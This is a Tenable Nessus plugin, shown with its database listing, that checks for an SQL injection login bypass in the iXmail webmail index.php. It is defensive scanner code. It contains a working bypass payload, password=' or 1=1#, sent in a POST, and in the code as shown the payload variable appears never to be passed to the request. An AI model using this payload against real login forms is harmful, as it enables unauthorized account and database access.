ID IXMAIL_SQL_INJECTION.NASL Type nessus Reporter This script is Copyright (C) 2003-2021 Tenable Network Security, Inc. Modified 2003-06-27T00:00:00
Description
The remote host is running the iXmail webmail interface.
There is a flaw in this interface that allows an attacker to log in
as any user by using a SQL injection flaw in the code of index.php.
An attacker may use this flaw to gain unauthorized access on this
host, or to gain the control of the remote database.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if(description)
{
script_id(11782);
script_version("1.22");
script_bugtraq_id(8047);
script_name(english:"iXmail index.php password Parameter SQL Injection");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is vulnerable to a SQL injection attack." );
script_set_attribute(attribute:"description", value:
"The remote host is running the iXmail webmail interface.
There is a flaw in this interface that allows an attacker to log in
as any user by using a SQL injection flaw in the code of index.php.
An attacker may use this flaw to gain unauthorized access on this
host, or to gain the control of the remote database." );
script_set_attribute(attribute:"solution", value:
"Upgrade to iXMail 0.4." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2003/06/27");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english: "Checks for iXMail");
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.");
script_family(english: "CGI abuses");
script_dependencie("find_service1.nasl", "http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_keys("www/PHP");
exit(0);
}
# The script code starts here
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if(!get_port_state(port)) exit(0);
if(!can_host_php(port:port)) exit(0);
name = rand_str(charset: "aegijlnoprsvw", length: 6);
data = "username="+name+"&password=%27+or+1%3D1%23&login=Login";
h = make_array("Content-Type", "application/x-www-form-urlencoded");
foreach dir ( cgi_dirs() )
{
r = http_send_recv3(port: port, method: 'POST', item: dir+"/index.php", add_headers: h);
if (isnull(r)) exit(0);
if(egrep(pattern:"^Location: ixmail_box\.php", string: r[1]))
{
security_hole(port);
set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
exit(0);
}
}
{"id": "IXMAIL_SQL_INJECTION.NASL", "bulletinFamily": "scanner", "title": "iXmail index.php password Parameter SQL Injection", "description": "The remote host is running the iXmail webmail interface. \n\nThere is a flaw in this interface that allows an attacker to log in\nas any user by using a SQL injection flaw in the code of index.php. \n\nAn attacker may use this flaw to gain unauthorized access on this\nhost, or to gain the control of the remote database.", "published": "2003-06-27T00:00:00", "modified": "2003-06-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/11782", "reporter": "This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.", "references": [], "cvelist": [], "type": "nessus", "lastseen": "2021-01-20T11:36:06", "edition": 22, "viewCount": 0, "enchantments": {"dependencies": {"references": [], "modified": "2021-01-20T11:36:06", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-01-20T11:36:06", "rev": 2}, "vulnersScore": -0.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(11782);\n script_version(\"1.22\");\n script_bugtraq_id(8047);\n \n script_name(english:\"iXmail index.php password Parameter SQL Injection\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is vulnerable to a SQL injection attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running the iXmail webmail interface. \n\nThere is a flaw in this interface that allows an attacker to log in\nas any user by using a SQL injection flaw in the code of index.php. \n\nAn attacker may use this flaw to gain unauthorized access on this\nhost, or to gain the control of the remote database.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to iXMail 0.4.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/06/27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english: \"Checks for iXMail\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.\");\n \n script_family(english: \"CGI abuses\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n# The script code starts here\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nif(!get_port_state(port)) exit(0);\nif(!can_host_php(port:port)) exit(0);\n\nname = rand_str(charset: \"aegijlnoprsvw\", length: 6);\ndata = \"username=\"+name+\"&password=%27+or+1%3D1%23&login=Login\";\n\nh = make_array(\"Content-Type\", \"application/x-www-form-urlencoded\");\nforeach dir ( cgi_dirs() )\n{\n r = http_send_recv3(port: port, method: 'POST', item: dir+\"/index.php\", add_headers: h);\n if (isnull(r)) exit(0);\n if(egrep(pattern:\"^Location: ixmail_box\\.php\", string: r[1]))\n {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "11782", "cpe": [], "scheme": null}